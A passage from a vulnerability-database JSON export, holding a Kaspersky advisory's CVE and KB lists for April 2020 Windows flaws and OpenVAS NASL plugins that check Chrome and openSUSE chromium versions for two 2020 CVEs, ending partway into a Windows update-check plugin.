\n[CVE-2020-0992](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0992>) \n[CVE-2020-0821](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0821>) \n[CVE-2020-0999](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0999>) \n[CVE-2020-1000](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1000>) \n[CVE-2020-0950](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0950>) \n[CVE-2020-0939](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0939>) \n[CVE-2020-0952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0952>) \n[CVE-2020-0955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0955>) \n[CVE-2020-0918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0918>) \n[CVE-2020-1006](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1006>) \n[CVE-2020-0888](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0888>) \n[CVE-2020-1008](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1008>) \n[CVE-2020-1009](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1009>) \n[CVE-2020-0917](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0917>) \n[CVE-2020-0937](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0937>) \n[CVE-2020-1027](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1027>) \n[CVE-2020-0936](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0936>) \n[CVE-2020-0934](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0934>) \n[CVE-2020-1020](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1020>) \n[CVE-2020-1017](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1017>) \n[CVE-2020-1016](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1016>) \n[CVE-2020-0794](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0794>) \n[CVE-2020-0940](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0940>) \n[CVE-2020-0938](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0938>) \n[CVE-2020-1001](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1001>) \n[CVE-2020-1004](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1004>) \n[CVE-2020-0699](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0699>) \n[CVE-2020-1005](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1005>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-0987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0987>)2.1Warning \n[CVE-2020-0982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0982>)2.1Warning \n[CVE-2020-0889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0889>)9.3Critical \n[CVE-2020-0960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0960>)9.3Critical \n[CVE-2020-0962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0962>)2.1Warning \n[CVE-2020-1007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1007>)2.1Warning \n[CVE-2020-0964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0964>)9.3Critical \n[CVE-2020-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0965>)4.6Warning \n[CVE-2020-0988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0988>)9.3Critical \n[CVE-2020-0959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0959>)9.3Critical \n[CVE-2020-1015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1015>)7.2High \n[CVE-2020-1014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1014>)7.2High \n[CVE-2020-0946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0946>)4.3Warning \n[CVE-2020-1011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1011>)7.2High \n[CVE-2020-1009](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1009>)7.2High \n[CVE-2020-0907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0907>)9.3Critical \n[CVE-2020-1094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1094>)7.2High \n[CVE-2020-0687](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0687>)9.3Critical \n[CVE-2020-0995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0995>)9.3Critical \n[CVE-2020-0994](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0994>)9.3Critical \n[CVE-2020-0993](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0993>)6.8High \n[CVE-2020-0992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0992>)9.3Critical \n[CVE-2020-0821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0821>)2.1Warning \n[CVE-2020-0999](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0999>)9.3Critical \n[CVE-2020-1000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1000>)7.2High \n[CVE-2020-0953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0953>)9.3Critical \n[CVE-2020-0952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0952>)4.3Warning \n[CVE-2020-1004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1004>)7.2High \n[CVE-2020-1005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1005>)2.1Warning \n[CVE-2020-0956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0956>)7.2High \n[CVE-2020-1008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1008>)9.3Critical \n[CVE-2020-0958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0958>)7.2High \n[CVE-2020-1020](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1020>)6.8High \n[CVE-2020-1027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1027>)7.2High \n[CVE-2020-0938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0938>)6.8High \n[CVE-2020-0955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0955>)2.1Warning \n[CVE-2020-0985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0985>)7.2High \n[CVE-2020-0983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0983>)7.2High \n[CVE-2020-0981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0981>)4.6Warning \n[CVE-2020-0942](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0942>)3.6Warning \n[CVE-2020-0947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0947>)4.3Warning \n[CVE-2020-0948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0948>)9.3Critical \n[CVE-2020-0949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0949>)9.3Critical \n[CVE-2020-0945](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0945>)4.3Warning \n[CVE-2020-0784](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0784>)7.2High \n[CVE-2020-0910](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0910>)7.7Critical \n[CVE-2020-1003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1003>)7.2High \n[CVE-2020-0913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0913>)7.2High \n[CVE-2020-1029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1029>)7.2High \n[CVE-2020-0944](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0944>)4.6Warning \n[CVE-2020-0996](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0996>)7.2High \n[CVE-2020-0950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0950>)9.3Critical \n[CVE-2020-0939](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0939>)4.3Warning \n[CVE-2020-0918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0918>)7.4High \n[CVE-2020-1006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1006>)7.2High \n[CVE-2020-0888](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0888>)7.2High \n[CVE-2020-0917](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0917>)7.4High \n[CVE-2020-0937](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0937>)4.3Warning \n[CVE-2020-0936](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0936>)3.6Warning \n[CVE-2020-0934](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0934>)4.6Warning \n[CVE-2020-1017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1017>)7.2High \n[CVE-2020-1016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1016>)2.1Warning \n[CVE-2020-0794](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0794>)4.9Warning \n[CVE-2020-0940](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0940>)7.2High \n[CVE-2020-1001](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1001>)7.2High \n[CVE-2020-0699](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0699>)2.1Warning\n\n### *KB list*:\n[4549949](<http://support.microsoft.com/kb/4549949>) \n[4550927](<http://support.microsoft.com/kb/4550927>) \n[4550929](<http://support.microsoft.com/kb/4550929>) \n[4550917](<http://support.microsoft.com/kb/4550917>) \n[4549951](<http://support.microsoft.com/kb/4549951>) \n[4550971](<http://support.microsoft.com/kb/4550971>) \n[4550961](<http://support.microsoft.com/kb/4550961>) \n[4550922](<http://support.microsoft.com/kb/4550922>) \n[4550930](<http://support.microsoft.com/kb/4550930>) \n[4550970](<http://support.microsoft.com/kb/4550970>) \n[4571692](<http://support.microsoft.com/kb/4571692>) \n[4571694](<http://support.microsoft.com/kb/4571694>)\n\n### *Microsoft official advisories*:", "edition": 2, "modified": "2020-09-10T00:00:00", "published": "2020-04-14T00:00:00", "id": "KLA11744", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11744", "title": "\r KLA11744Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-03-04T16:37:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "The remote host is missing an update for the ", "modified": "2020-03-03T00:00:00", "published": "2020-02-28T00:00:00", "id": "OPENVAS:1361412562310853048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853048", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2020:0259-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853048\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-28 04:01:58 +0000 (Fri, 28 Feb 2020)\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2020:0259-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0259-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00033.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the openSUSE-SU-2020:0259-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for chromium fixes the following issues:\n\n Chromium was updated to version 80.0.3987.122 (bsc#1164828).\n\n Security issues fixed:\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\n Non-security issues fixed:\n\n - Dropped the sandbox binary as it should not be needed anymore\n (bsc#1163588).\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-259=1\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:40:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-03-03T00:00:00", "published": "2020-02-25T00:00:00", "id": "OPENVAS:1361412562310816586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816586", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-MAC OS X", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816586\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-03-03T00:00:00", "published": "2020-02-25T00:00:00", "id": "OPENVAS:1361412562310816585", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816585", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Linux", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816585\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:38:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-03-03T00:00:00", "published": "2020-02-25T00:00:00", "id": "OPENVAS:1361412562310816584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816584", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Windows", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816584\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T19:50:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1000", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0957", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "description": "This host is missing a critical security\n update according to Microsoft KB4550964", "modified": "2020-07-17T00:00:00", "published": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310816823", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816823", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550964)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 